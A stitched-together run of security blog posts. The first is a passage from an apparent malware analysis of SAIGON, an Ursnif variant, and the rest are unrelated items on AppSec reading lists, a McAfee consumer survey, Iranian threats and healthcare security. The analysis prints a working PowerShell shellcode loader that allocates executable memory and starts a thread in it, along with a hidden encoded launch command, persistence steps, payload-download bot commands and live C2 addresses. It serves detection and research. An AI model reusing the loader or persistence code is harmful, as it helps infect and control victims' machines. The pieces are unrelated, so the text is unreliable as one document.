dHVkKTsiOyR0c2thYXhvdHhlPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR0c2t2byAtTmFtZSAnV2luMzI
nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1OyRtaHhrcHVsbD0kdHNrYWF4b3R4ZTo6Vml
ydHVhbEFsbG9jKDAsJHdneG1qZ2J4dGosMHgzMDAwLDB4NDApO1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU
2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGhhbmtzZWZrc2d1LDAsJG1oeGtwdWxsLCR3Z3htamdieHRqKTskd
GRvY25ud2t2b3E9JHRza2FheG90eGU6OkNyZWF0ZVJlbW90ZVRocmVhZCgtMSwwLDAsJG1oeGtwdWxsLC
RtaHhrcHVsbCwwLDApOyRvY3h4am1oaXltPSR0c2thYXhvdHhlOjpXYWl0Rm9yU2luZ2xlT2JqZWN0KCR0ZG
9jbm53a3ZvcSwzMDAwMCk7")));

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).


Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.


Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:

PowerShell.exe -windowstyle hidden -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA
OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5
AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A

After removing the Base64 encoding from this command, it looks something like "iex (gp 'HKCU:\\Identities\\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun."  When executed, this command retrieves the contents of the previous registry value using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).
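
The decoding can be reproduced outside of PowerShell, since the -ec/-EncodedCommand argument is simply Base64 over a UTF-16LE string. A minimal Python sketch using the encoded blob above:

import base64

# PowerShell's -ec/-EncodedCommand argument is Base64 over a UTF-16LE string.
encoded = (
    "aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA"
    "OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5"
    "AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A"
)
print(base64.b64decode(encoded).decode("utf-16-le"))
# -> iex (gp 'HKCU:\Identities\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun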

Finally, the PowerShell code in the registry allocates a block of memory, copies the Base64-decoded shellcode blob into it, launches a new thread pointing to the area using CreateRemoteThread, and waits for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
[DllImport("kernel32")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@;

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.

Configuration

The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).


Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration
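
Locating this joined data is straightforward; the standard-library Python sketch below reads the Security Directory entry (whose VirtualAddress is a raw file offset, per the PE specification) and checks for the "WD" magic. The layout of the bundled-file records themselves is not documented here, so the sketch deliberately stops at the magic check.

import struct
import sys

def find_joined_data(path):
    """Locate the Ursnif/SAIGON "joined data" blob via the Security Directory."""
    with open(path, "rb") as f:
        data = f.read()

    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    magic = struct.unpack_from("<H", data, e_lfanew + 0x18)[0]   # 0x10b=PE32, 0x20b=PE32+
    dir_table = e_lfanew + 0x18 + (0x60 if magic == 0x10B else 0x70)

    # Entry 4 is IMAGE_DIRECTORY_ENTRY_SECURITY; its VirtualAddress is a raw
    # file offset rather than an RVA.
    offset, size = struct.unpack_from("<II", data, dir_table + 4 * 8)
    if offset == 0 or size == 0:
        return None

    blob = data[offset:offset + size]
    if blob[:2] != b"WD":          # the 0x4457 magic described above
        return None
    return offset, size, blob

if __name__ == "__main__":
    print(find_joined_data(sys.argv[1]))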

The following is a list of configuration options observed:

Name Checksum  Name           Description
0x97ccd204     HostsList      List of C2 URLs used for communication
0xd82bcb60     ServerKey      Serpent key used for communicating with the C2
0x23a02904     Group          Botnet ID
0x776c71c0     IdlePeriod     Number of seconds to wait before the initial request to the C2
0x22aa2818     MinimumUptime  Waits until the uptime is greater than this value (in seconds)
0x5beb543e     LoadPeriod     Number of seconds to wait between subsequent requests to the C2
0x84485ef2     HostKeepTime   The number of minutes to wait before switching to the next C2 server in case of failures

Table 1: Configuration options

Communication

While the network communication structure of SAIGON is very similar to Ursnif v3, there are some subtle differences. SAIGON beacons are sent to the C2 servers as multipart/form-data encoded requests via HTTP POST to the "/index.html" URL path. The payload to be sent is first encrypted using Serpent encryption (in ECB mode, rather than the CBC mode used by Ursnif v3), then Base64-encoded. Responses from the server are encrypted with the same Serpent key and signed with the server's RSA private key.

SAIGON uses the following User-Agent header in its HTTP requests: "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0," where <os_version> consists of the operating system's major and minor version number (e.g. 10.0 on Windows 10, and 6.1 on Windows 7) and the string "; Win64; x64" is appended when the operating system is 64-bit. This yields the following example User Agent strings:

  • "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 10 64-bit
  • "Mozilla/5.0 (Windows NT 6.1; rv:58.0) Gecko/20100101 Firefox/58.0" on Windows 7 32-bit

The request format is also somewhat similar to the one used by other Ursnif variants described in Table 2:

ver=%u&group=%u&id=%08x%08x%08x%08x&type=%u&uptime=%u&knock=%u

Name    Description
ver     Bot version (unlike other Ursnif variants this only contains the build number, i.e. the xxx digits from "3.5.xxx")
group   Botnet ID
id      Client ID
type    Request type (0 – when polling for tasks, 6 – for system info data uploads)
uptime  Machine uptime in seconds
knock   The bot "knock" period (number of seconds to wait between subsequent requests to the C2; see the LoadPeriod configuration option)

Table 2: Request format components
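
The sketch below assembles a beacon body with the fields from Table 2. All values are placeholders for illustration (the group and knock values mirror the Botnet ID and Load Period seen in the Appendix A samples); the id shown is simply four 32-bit words rendered as "%08x".

import time

def build_beacon(ver, group, client_id_words, req_type, boot_time, knock):
    # client_id_words: four 32-bit integers rendered as "%08x%08x%08x%08x".
    client_id = "".join(f"{w:08x}" for w in client_id_words)
    uptime = int(time.time() - boot_time)
    return (f"ver={ver}&group={group}&id={client_id}"
            f"&type={req_type}&uptime={uptime}&knock={knock}")

# Example with placeholder values (not taken from a real infection):
print(build_beacon(132, 1001, (0x11111111, 0x22222222, 0x33333333, 0x44444444),
                   0, time.time() - 3600, 300))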

Capabilities

SAIGON implements the bot commands described in Table 3.

Name Checksum  Name         Description
0x45d4bf54     SELF_DELETE  Uninstalls itself from the machine; removes the scheduled task and deletes its registry key
0xd86c3bdc     LOAD_UPDATE  Download data from URL, decrypt and verify signature, save it as a .ps1 file and run it using "PowerShell.exe -ep unrestricted -file %s"
0xeac44e42     GET_SYSINFO  Collects and uploads system information by running: "systeminfo.exe", "net view", "nslookup 127.0.0.1", "tasklist.exe /SVC", "driverquery.exe", and "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s"
0x83bf8ea0     LOAD_DLL     Download data from URL, decrypt and verify, then use the same shellcode loader that was used to load itself into memory to load the DLL into the current process
0xa8e78c43     LOAD_EXE     Download data from URL, decrypt and verify, save with an .exe extension, invoke using ShellExecute

Table 3: SAIGON bot commands

Comparison to Ursnif v3

Table 4 summarizes the similarities and differences between Ursnif v3 and the analyzed SAIGON samples:

Persistence method: identical (scheduled task that executes code stored in a registry key using PowerShell)
Configuration storage: identical (Security PE directory points to embedded binary data starting with 'WD' magic bytes, aka the Ursnif "joined files")
PRNG algorithm: identical (xorshift64*)
Checksum algorithm: Ursnif v3 uses JAMCRC (aka CRC32 with all the bits flipped); SAIGON uses CRC32 with the result rotated to the right by 1 bit
Data compression: identical (aPLib)
Encryption/Decryption: Ursnif v3 uses Serpent in CBC mode; SAIGON uses Serpent in ECB mode
Data integrity verification: identical (RSA signature)
Communication method: identical (HTTP POST requests)
Payload encoding: both use unpadded Base64; Ursnif v3 replaces '+' and '/' with '_2B' and '_2F' and adds random slashes, while SAIGON replaces them with '%2B' and '%2F' and adds no random slashes
Uses URL path mimicking: Ursnif v3 yes, SAIGON no
Uses PX file format: Ursnif v3 yes, SAIGON no

Table 4: Similarities and differences between Ursnif v3 and SAIGON samples
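
The checksum tweak noted in Table 4 is easy to reproduce; the sketch below shows both the JAMCRC used by Ursnif v3 and the rotated-CRC32 variant used by SAIGON. The exact input normalization (case, encoding) applied to process names before hashing is not documented here, so the example input is only illustrative.

import zlib

def jamcrc(data: bytes) -> int:
    # Ursnif v3: standard CRC32 with all bits flipped.
    return zlib.crc32(data) ^ 0xFFFFFFFF

def saigon_checksum(data: bytes) -> int:
    # SAIGON: standard CRC32 with the 32-bit result rotated right by one bit.
    crc = zlib.crc32(data)
    return ((crc >> 1) | ((crc & 1) << 31)) & 0xFFFFFFFF

# The post states the checksum of the shell's parent process name "explorer.exe"
# is 0xc3c07cf0; how the name is cased/encoded before hashing is not documented,
# so this only illustrates the algorithm itself.
print(hex(jamcrc(b"explorer.exe")), hex(saigon_checksum(b"explorer.exe")))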

Figure 4 shows Ursnif v3's use of URL path mimicking. This tactic has not been seen in other Ursnif variants, including SAIGON.


Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green); this behavior is not seen in SAIGON samples

Implications

It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilation timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported by our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations, as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.

Acknowledgements

The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b15
02ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f5
93518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs:

  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d9453
34f8457815dd6e75cffa5ee33ae486cb6ea1ddb88411d97d5937ba597e5c430a60eac882d8207618d14b660
70ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

User-Agent:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'
    'b8000000000000004000000000000000'
    '00000000000000000000000000000000'
    '00000000000000000000000080000000'
    '0e1fba0e00b409cd21b8014ccd215468'
    '69732070726f6772616d2063616e6e6f'
    '742062652072756e20696e20444f5320'
    '6d6f64652e0d0d0a2400000000000000'
)

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    # SAIGON shellcode blobs start with a JMP (0xE9) stub; anything that already
    # starts with 'MZ' is a regular PE file and needs no conversion.
    if data.startswith(b'MZ'):
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    # Restore the "PE\0\0" signature over the loader's JMP stub and set the COFF
    # Machine field based on the architecture byte found at offset 5.
    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)    # IMAGE_FILE_MACHINE_I386
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)   # IMAGE_FILE_MACHINE_AMD64
    else:
        print('Unknown architecture.')
        return

    # FileAlignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    # Zero out everything between the end of the optional header and the first
    # section at 0x1000; the section table is rebuilt below.
    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]  # SizeOfHeaders

    # Estimate the size of the read-only data section by locating a marker of five
    # consecutive DWORDs (3, 5, 7, 11, 13); fall back to 0x3000 if it is not found.
    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    # Rebuild a minimal section table: .text, .rdata, .data, then either
    # .pdata/.bss (PE32+) or .bss/.reloc (PE32).
    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.text',
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
        0x60000020
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.rdata',
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
        0x40000040
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.data',
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,
        0xc0000040
    )

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.pdata',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0x40000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0xc0000040
        )
    else:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0xc0000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.reloc',
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0x40000040
        )

    # Prepend a stock DOS (MZ) stub to the rebuilt headers, then append the section
    # data, which starts at offset 0x1000 in the shellcode blob.
    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())

 

if __name__ == "__main__":
    main()

Did You Read Our Most Popular 2019 Blog Posts?

What were your biggest AppSec questions and concerns in 2019? Want to find out what others' were? Every January, we look at the most-read blog posts from the previous year, and it always proves to be a valuable exercise for us, and we hope for you as well. The posts below were favorites among our readers in 2019 and highlight the software security issues that were top of mind. Their popularity could also stem from the very practical advice they contain; we got the message, so look for more of the same in 2020!

Detailed information on vulnerabilities and exploits, and how to prevent and avoid them

The blog posts below contain detailed explanations of vulnerabilities and exploits from our own research team and penetration testers. Clearly, there is an appetite for a first-hand closer look at how developers are creating vulnerabilities, and how attackers are exploiting them.

Exploiting Spring Boot Actuators

Exploiting JNDI Injections in Java

Data Extraction to Command Execution CSV Injection

The Top Five Web Application Authentication Vulnerabilities We Find

Managing open source risk

As in the past several years, blog posts on open source risk, and how Veracode helps to reduce it, landed in the top 10.

Introducing New Veracode Software Composition Analysis

How Veracode Scans Docker Containers for Open Source Vulnerabilities

Complying with AppSec regulations

As major data breaches continue to expose customers' sensitive data and cause major monetary and reputation damage to organizations, regulators are taking notice. From the EU General Data Protection Regulation (EU GDPR) to the NY State Department of Financial Services (NY DFS) Cybersecurity Regulations, more regulations are including application security requirements, and complying with them is becoming a major driver for security professionals. In turn, two blog posts about cybersecurity regulations were featured on the most-read list for 2019.

PCI Releases Software Security Framework

Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity

Subscribe to our content

Did you miss any of these posts last year? Don't miss a thing in 2020; subscribe to our content.

NICE Released the Winter 2019-20 eNewsletter

The Winter 2019-20 NICE eNewsletter has been published to provide subscribers with information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs and projects, the NICE Working Group, and other important news. To help increase the visibility of NICE, the NICE Program Office issues these regular eNewsletters featuring spotlight articles on those developments and updates.

Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020

From the Lifx Switch smart switch to the Charmin RollBot to Kohler Setra Alexa-connected faucets, CES 2020 has introduced new devices aimed at making consumers' lives easier. With so much excitement and hype around these new gadgets, however, it can be challenging to make security a top priority. That’s why McAfee is urging users to keep cybersecurity top-of-mind when bringing these new devices into their home so they can protect what matters.

New McAfee research reveals that consumer perceptions of security accountability have shifted in the last couple of years. For example, the majority of Americans today (63%) stated that they as the consumer are responsible for their security while last year only 42% of Americans felt that they are responsible. This shows that users are becoming increasingly aware of how to ensure that they are protecting their privacy and identity. This year-over-year increase could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. Additionally, 65% are concerned about the security of connected devices installed in their homes, such as the Chamberlain MyQ Hub garage door opener and the McLear Smart Ring. While these devices are convenient, the McAfee Advanced Threat Research team recently revealed they contained security flaws that could allow a hacker to enter a victim’s home.

It’s important to recognize that security is a proactive effort that should be seamlessly integrated into everyday life. So, how can consumers take charge and feel confident bringing new technology into their homes while staying safe? Check out the following tips to keep in mind as our lives continue to be more connected:

  • The little things count. Hackers don’t have to be geniuses to steal your personal information. Minor habits like changing default passwords and using unique passwords can go a long way to prevent your personal information from being stolen.
  • Do your research. Look up products and their manufacturers before making a purchase. This could save you from buying a device with a known security vulnerability. If you find a manufacturer doesn’t have a history of taking security seriously, then it’s best to avoid it.
  • Use a comprehensive security solution. Use comprehensive security protection, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which can help identify malicious websites.
  • Update, update, update. When applications on your devices need updating, be sure to do it as soon as possible. Most of these updates include security patches to vulnerabilities.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Survey Methodology

McAfee commissioned 3Gem to conduct a survey of 1,000 adults in the US who regularly use electronic devices, such as phones and laptops.

The post Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 appeared first on McAfee Blogs.

Iran Cyber Threat Update

Recent political tensions in the Middle East region have led to significant speculation of increased cyber-related activities. McAfee is on a heightened state of alert to monitor the evolving threats and rapidly implement coverage across all McAfee products as intelligence becomes available. Known campaigns associated with the threat actors from this region were integrated into our products and we continue to monitor our global telemetry for any further activity.

Current activity

We are observing activity that claim to be attributed from threat actors from this region, however, distinguishing attribution between cybercrime and nation state will be crucial since the line will likely blur. For example, typical cybercrime activities such as ransomware, or indeed defacements or DDoS, could well be a mask for nation-state activities.

The post Iran Cyber Threat Update appeared first on McAfee Blogs.

Work in Healthcare? This is Why You Should Give Your Security a Checkup

Most patients practice preventative care through regular trips to the doctor, catching minor issues before they turn into major medical problems. So, why don't more organizations follow suit with security testing to prevent breaches and fortify the safety of patient information?

Too often, remediation is an afterthought as developers scramble to patch holes in their systems post-breach. A recent report in the journal of Health Services Research suggests that this herculean effort can put a strain on patient health when things slow down after a breach and new security measures are introduced. However, preventative care can work in the security world just as it does for your health.

Less isn't more in healthcare cybersecurity

Some experts and industry thought leaders see unfortunate breaches as opportunities to better understand what went wrong and how it can be prevented in the future. Unfortunately, information from these breaches sometimes muddies the tumultuous waters of cybersecurity and can cause panic over increased security procedures.

Josephine Wolff, assistant professor of cybersecurity policy at Tufts Fletcher School of Law and Diplomacy, found that the 2019 report published in the journal of Health Services Research draws dangerous conclusions about the negative impacts of mitigating cyberattacks in healthcare. The HSR paper proposes that lost passwords and associated security measures, like two-factor authentication, hold up patient care with increased wait times for ECGs and result in higher rates of fatal heart attacks, a point that, they suggest, should lead to less aggressive security efforts.

In her article, Wolff proposes that a slower remediation process is precisely why more medical institutions should view this as a crucial pivot point, not a nuisance. She explains, “Undoubtedly, IT upgrades and updates can inconvenience workers and slow down operations in any workplace, but that is a reason to develop techniques and processes for implementing them more smoothly, not to write them off as harmful and counterproductive.” Even the most basic preventive actions are crucial best practices, and they're just a starting point.

The cyberattack epidemic in healthcare

Data from the last decade shows just how damaging breaches can be for institutions and patients alike. According to HIPAA Journal, there were 2,546 healthcare breaches from 2009 to 2018 that exposed over 180,000,000 patient records to attackers, resulting in costly settlements and fines for HIPAA violations. Additionally, figures from the Protenus 2019 Breach Barometer report reveal that in 2018 alone, the healthcare sector saw a whopping 15,085,302 patient records breached, a number that nearly tripled from 2017 to 2018.

These trends are alarming but important to watch. Our 10th annual State of Software Security (SOSS) report examines trends in various industries, including healthcare, and the data sheds some light on why it's so crucial for organizations to get a jump on security measures.

Healthcare Security Rank

We found that healthcare institutions have the highest prevalence of severe flaws at 52 percent and are the slowest to fix said flaws, with a median time-to-remediation (MedianTTR) of 131 days. All this typically contributes to security debt, which accumulates over time as more and more flaws are left uncorrected.

Daunting security debt is a problem that your DevOps team can tackle with the right processes in place, including a steady cadence of scans. Our SOSS report found that those who conduct up to 12 scans per year have a MedianTTR of 68 days, while those who scan more than 260 times per year have a MedianTTR of just 19 days (that's a substantial 72 percent reduction in remediation time).

Increasing the regularity of your scans can have a lasting impact on security debt. In fact, we found that frequent scanners carry 5x less security debt than sporadic scanners who lack a reliable testing process. The remedy is clear: scanning often and speeding up fix rates to mitigate severe flaws will cause far fewer headaches in the future and, ultimately, prevent downtrends in patient care.

A process-minded prognosis

The good news in this year's SOSS report is that healthcare institutions have a fix rate of 72 percent, which is decent when compared to other industries. Still, hospitals and healthcare providers must stay on top of application scanning to increase frequency and efficiency, cutting down their MedianTTR.

The solution? Shifting DevSecOps behaviors from reactive to proactive through keener code management and more thorough remediation processes. This entails making sure security programs:

  • Include a trained team of security-minded developers
  • Cover all applications across your health organization
  • Include a frequent and steady scanning cadence
  • Have ample resources developers can tap into for testing and fixes
  • Are adaptable enough to handle shifting landscapes in cybersecurity
